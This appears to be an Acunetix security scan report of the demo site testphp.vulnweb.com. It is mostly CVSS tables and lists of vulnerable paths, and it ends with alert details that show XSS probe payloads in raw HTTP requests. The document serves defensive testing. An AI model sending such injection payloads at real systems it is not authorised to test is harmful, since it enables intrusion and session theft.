Developer HTTP Testphp Vulnweb Com
Developer HTTP Testphp Vulnweb Com
Report
Acunetix Security Audit
28 April 2020
Generated by Acunetix
1
Scan of testphp.vulnweb.com
Scan details
Scan information
Start time 28/04/2020, 06:29:55
Start url http://testphp.vulnweb.com/
Host testphp.vulnweb.com
Scan time 32 minutes, 15 seconds
Profile Full Scan
Server information nginx/1.4.1
Responsive True
Server OS Unknown
Server technologies PHP
Threat level
One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these
vulnerabilities and compromise the backend database and/or deface your website.
Alerts distribution
2
Alerts summary
Classification
Base Score: 6.4
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: Low
Availability Impact: None
CWE CWE-79
Affected items Variation
Web Server 1
/AJAX/showxml.php 1
/comment.php 1
/guestbook.php 2
/hpp/ 1
/hpp/params.php 2
/listproducts.php 2
/search.php 1
/secured/newuser.php 6
/userinfo.php 5
Directory traversal
Classification
3
Base Score: 6.8
Access Vector: Network_accessible
Access Complexity: Medium
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None
CWE CWE-22
Affected items Variation
/showimage.php 1
File inclusion
Classification
Base Score: 7.5
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-20
Affected items Variation
/showimage.php 1
Classification
4
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: High
Remediation Level: Official_fix
Report Confidence: Confirmed
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CVE CVE-2004-1893
CWE CWE-16
Affected items Variation
Web Server 1
Classification
Base Score: 5.1
Access Vector: Network_accessible
Access Complexity: High
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
CVSS2 Exploitability: Proof_of_concept
Remediation Level: Official_fix
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CVE CVE-2014-0133
CWE CWE-122
Affected items Variation
Web Server 1
Classification
5
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-16
Affected items Variation
Web Server 1
Classification
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-538
Affected items Variation
/admin/create.sql 1
SQL injection
Classification
6
Base Score: 6.8
Access Vector: Network_accessible
Access Complexity: Medium
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 10.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Changed
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: None
CWE CWE-89
Affected items Variation
Web Server 1
/AJAX/infoartist.php 1
/AJAX/infocateg.php 1
/AJAX/infotitle.php 1
/artists.php 2
/cart.php 4
/guestbook.php 1
/listproducts.php 3
/Mod_Rewrite_Shop/BuyProduct-3/ 1
/Mod_Rewrite_Shop/Details/color-printer/3/ 1
/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/ 1
/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/ 1
/product.php 2
/search.php 3
/secured/newuser.php 1
/sendcommand.php 1
/userinfo.php 12
Classification
7
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-16
Affected items Variation
/Mod_Rewrite_Shop/ 1
Classification
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None
CWE CWE-200
Affected items Variation
/listproducts.php 2
/secured/newuser.php 1
/showimage.php 1
/userinfo.php 5
Backup files
8
Classification
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-538
Affected items Variation
/index.bak 1
/index.zip 1
Classification
Base Score: 4.3
Access Vector: Network_accessible
Access Complexity: Medium
Authentication: None
Confidentiality Impact: None
Integrity Impact: Partial
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-20
Affected items Variation
/hpp/params.php 1
Classification
9
Base Score: 6.4
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: Low
Availability Impact: None
CWE CWE-79
Affected items Variation
/showimage.php 1
Directory listing
Classification
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 7.5
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: High
Integrity Impact: None
Availability Impact: None
CWE CWE-538
Affected items Variation
10
/.idea/ 1
/.idea/scopes/ 1
/_mmServerScripts/ 1
/admin/ 1
/Connections/ 1
/CVS/ 1
/Flash/ 1
/images/ 1
/Mod_Rewrite_Shop/images/ 1
/pictures/ 1
/Templates/ 1
/wvstests/ 1
/wvstests/pmwiki_2_1_19/ 1
/wvstests/pmwiki_2_1_19/scripts/ 1
Classification
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None
CWE CWE-200
Affected items Variation
/AJAX/infoartist.php 1
/AJAX/infocateg.php 1
/AJAX/infotitle.php 1
/Connections/DB_Connection.php 1
/pictures/path-disclosure-unix.html 1
/secured/database_connect.php 1
11
HTML form without CSRF protection
Classification
Base Score: 2.6
Access Vector: Network_accessible
Access Complexity: High
Authentication: None
Confidentiality Impact: None
Integrity Impact: Partial
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 4.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: Required
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: Low
Availability Impact: None
CWE CWE-352
Affected items Variation
Web Server 1
/404.php 1
/artists.php 1
/cart.php 1
/categories.php 1
/comment.php 1
/disclaimer.php 1
/guestbook.php 2
/hpp/ 1
/index.php 1
/listproducts.php 1
/login.php 2
/product.php 2
/search.php 1
/signup.php 2
/Templates/main_dynamic_template.dwt.php 1
/userinfo.php 2
Classification
12
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: Partial
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 9.1
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: None
CWE CWE-88
Affected items Variation
/hpp/ 1
Classification
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 6.5
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: Low
Availability Impact: None
CWE CWE-284
Affected items Variation
13
Web Server 1
Classification
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-538
Affected items Variation
Web Server 1
Classification
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None
CWE CWE-16
Affected items Variation
/secured/phpinfo.php 1
14
Classification
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None
CWE CWE-16
Affected items Variation
/secured/phpinfo.php 1
Classification
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None
CWE CWE-16
15
Affected items Variation
Web Server 1
Classification
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None
CWE CWE-16
Affected items Variation
/secured/phpinfo.php 1
Classification
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-16
Affected items Variation
/secured/phpinfo.php 1
16
PHPinfo page
Classification
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 7.5
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: High
Integrity Impact: None
Availability Impact: None
CWE CWE-200
Affected items Variation
/secured/phpinfo.php 1
Classification
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
17
Base Score: 7.5
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: High
Integrity Impact: None
Availability Impact: None
CWE CWE-200
Affected items Variation
/secured/phpinfo.php 1
Classification
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 7.5
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: High
Integrity Impact: None
Availability Impact: None
CWE CWE-538
Affected items Variation
/index.bak 1
/pictures/wp-config.bak 1
Classification
18
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: High
Remediation Level: Workaround
Report Confidence: Confirmed
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 9.1
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: None
CWE CWE-310
Affected items Variation
/login.php 1
/signup.php 1
Classification
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-538
Affected items Variation
/pictures/WS_FTP.LOG 1
Classification
19
Base Score: 4.3
Access Vector: Network_accessible
Access Complexity: Medium
Authentication: None
Confidentiality Impact: None
Integrity Impact: Partial
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-693
Affected items Variation
Web Server 1
Classification
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-16
Affected items Variation
Web Server 1
Classification
20
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-16
Affected items Variation
Web Server 1
Classification
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-16
Affected items Variation
/product.php 1
Classification
21
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-538
Affected items Variation
/Connections/DB_Connection.php 1
/secured/database_connect.php 1
Classification
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 7.5
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: High
Integrity Impact: None
Availability Impact: None
CWE CWE-200
Affected items Variation
/hpp/test.php 1
Classification
22
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 7.5
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: High
Integrity Impact: None
Availability Impact: None
CWE CWE-200
Affected items Variation
Web Server 1
Unencrypted connection
Classification
Base Score: 5.8
Access Vector: Network_accessible
Access Complexity: Medium
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 9.1
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: None
CWE CWE-310
Affected items Variation
23
Web Server 1
Classification
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-16
Affected items Variation
Web Server 1
Classification
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 0.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CWE CWE-200
Affected items Variation
Web Server 2
/404.php 1
24
/artists.php 1
/cart.php 1
/categories.php 1
/disclaimer.php 1
/guestbook.php 1
/index.bak 1
/index.php 1
/listproducts.php 1
/login.php 1
/product.php 1
/search.php 1
/signup.php 1
/Templates/main_dynamic_template.dwt.php 1
/userinfo.php 1
Classification
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 7.5
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: High
Integrity Impact: None
Availability Impact: None
CWE CWE-200
Affected items Variation
/secured/office.htm 1
Classification
25
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 7.5
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: High
Integrity Impact: None
Availability Impact: None
CWE CWE-200
Affected items Variation
Web Server 2
Classification
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 7.5
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: High
Integrity Impact: None
Availability Impact: None
CWE CWE-200
Affected items Variation
26
/404.php 1
/pictures/ipaddresses.txt 1
/secured/phpinfo.php 1
Classification
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
Base Score: 7.5
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: High
Integrity Impact: None
Availability Impact: None
CWE CWE-200
Affected items Variation
/pictures/path-disclosure-unix.html 1
/secured/phpinfo.php 1
Classification
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
27
Base Score: 7.5
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3 User Interaction: None
Scope: Unchanged
Confidentiality Impact: High
Integrity Impact: None
Availability Impact: None
CWE CWE-200
Affected items Variation
/pictures/credentials.txt 1
28
Alerts details
Severity High
Reported by module /Scripts/PerFile/XSS_in_URI_File.script
Description
Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts into
a legitimate website or web application. XSS occurs when a web application makes use of unvalidated or unencoded user
input within the output it generates.
Impact
Malicious JavaScript has access to all the same objects as the rest of the web page, including access to cookies and local
storage, which are often used to store session tokens. If an attacker can obtain a user's session cookie, they can then
impersonate that user.
Furthermore, JavaScript can read and make arbitrary modifications to the contents of a page being displayed to a user.
Therefore, XSS in conjunction with some clever social engineering opens up a lot of possibilities for an attacker.
Recommendation
References
Affected items
Web Server
Details
URI was set to 1<ScRiPt>fjC0(9307)</ScRiPt>
The input is reflected inside a text element.
Request headers
29
GET /404.php?1<ScRiPt>fjC0(9307)</ScRiPt> HTTP/1.1
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/AJAX/showxml.php
Verified vulnerability
Details
Cookie input mycookie was set to 3'"()&%<acx><ScRiPt >rntK(9680)</ScRiPt>
Request headers
GET /AJAX/showxml.php HTTP/1.1
Referer: https://www.google.com/search?hl=en&q=testing
Cookie: login=test%2Ftest;mycookie=3'"()&%<acx><ScRiPt%20>rntK(9680)</ScRiPt>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Connection: Keep-alive
/comment.php
Verified vulnerability
Details
URL encoded POST input name was set to <your name here>'"()&%<acx><ScRiPt >JD4Q(9412)</ScRiPt>
Request headers
30
POST /comment.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/
Cookie: login=test%2Ftest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 132
Host: testphp.vulnweb.com
Connection: Keep-alive
Submit=Submit&comment=555&name=<your%20name%20here>'"()%26%25<acx><ScRiPt%20>JD4Q(9412)
</ScRiPt>&phpaction=echo%20%24_POST[comment];
/guestbook.php
Verified vulnerability
Details
